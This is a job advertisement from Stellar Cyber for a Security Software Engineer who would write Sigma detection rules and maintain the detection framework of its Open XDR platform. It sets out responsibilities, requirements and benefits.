Security Software Engineer

Stellar Cyber is a fast-growing Cybersecurity company focused on delivering holistic cyberattack protection to organizations while significantly reducing total costs of ownership with its innovative Open XDR (eXtended Detection and Response) platformbased on advanced ML and security technologies. Stellar Cyber has been recognized by Gartner as one of the leading XDR players.

To accelerate our growth, we are seeking a talented Sr./Staff Security Engineer specializing in detection to join our cybersecurity team with startup passion, a can-do attitude, and a desire to make an impact, while building a future for themselves and Stellar Cyber. If you are excited to be part of a very fast-growing team with lots of opportunities, Stellar Cyber is a great place to grow your career.

Position Overview

As a highly skilled and motivated Security Software Engineer specializing in developing security software features to join our cybersecurity team. As a Security Software Engineer, you will play a crucial role in developing and maintaining out-of-the-box detection rules and the detection framework shipped with Stellar Cyber’s OpenXDR platform, making the platform achieve the best-in-class detection coverage.

Responsibilities

1. Research and author detection rules in Sigma format. Your top responsibility will be to create out-of-the-box detection rules in Stellar Cyber’s Open XDR platform. These rules will be covering various areas in need, such as endpoints (e.g., Windows, Linux), cloud (e.g., AWS, Azure), SaaS (e.g., Microsoft 365, Google Workspace), and network (e.g., DNS metadata).
2. Manage and build detection use cases for out-of-the-box detection rules. You will be responsible for organizing detection rules into carefully designed use cases (e.g., with alert types, TTP mappings, informative alert descriptions, etc.) that help Stellar Cyber’s customers to understand and work on the rule-triggered alerts effectively.
3. Design, develop, and maintain Stellar Cyber’s rule detection framework. You will be responsible for continuously improving the detection framework that runs the detection rules, such as the support for more Sigma rule syntax.
4. Design, develop, and maintain automation and appropriate CI/CD pipelines for detection rule development, testing, deployment, and other management features deemed necessary to improve efficiency of working with a large number of rules.
5. Continuously evaluate, monitor, and tune the accuracy and efficacy of detection rules. You will be responsible for periodically checking and evaluating the accuracy and efficacy of the detection rules deployed to Stellar Cyber’s customers, and tune certain noisy rules if necessary.
6. Collaborate with Product and Engineering teams to release detection rules and detection use cases. Releasing rules is a sophisticated process in which there are multiple considerations including customer needs, product roadmap, engineering feasibility. You will be closely working with Product Management, Engineering, and High-Value Customers to ensure a smooth release process.

Requirements

1. Bachelor’s or Master’s degree in Computer Science or a related field of study, and three years of experience or more in the security industry is preferred.
2. Strong system design and problem-solving skills in designing and implementing microservices, language parsers and compilers, detection engines, and etc.
3. Three years plus experience in Python or Java or Golang, with hands-on experience of implementing sophisticated software systems with these languages.
4. Experience with threat detections, detection tuning, and threat hunting in the security operation settings (e.g., with a SIEM product).
5. Experience with using, managing, developing Sigma rules, Splunk rules, Elastic rules, and Suricata rules or other IDS rules.
6. Security knowledge on networking, operating systems (Windows and Linux), web servers, firewalls, proxies, and cloud services (e.g., Azure, AWS, OCI), and being able to apply the knowledge in detection rule research and authoring.
7. Knowledge on MITRE ATT&CK Framework, Cyber Kill Chain, Unify Kill Chain, and being able to apply the knowledge in designing detection use cases.
8. Willingness and enthusiasm to keep up with new security trends and threats, as well as related technologies.
9. Excellent communication skills, both written and verbal, with the ability to present complex ideas to both technical and non-technical stakeholders.

Benefits

We pride ourselves in recognizing our employees. Here are some examples of our benefits program:

• Pre-IPO Stock Options
• Medical, Dental & Vision care
• 401(k)
• Employee Assistance Program
• Employee Discount Program
• Life Insurance
• Paid time off
• Referral Program
• Rewards and Recognition Program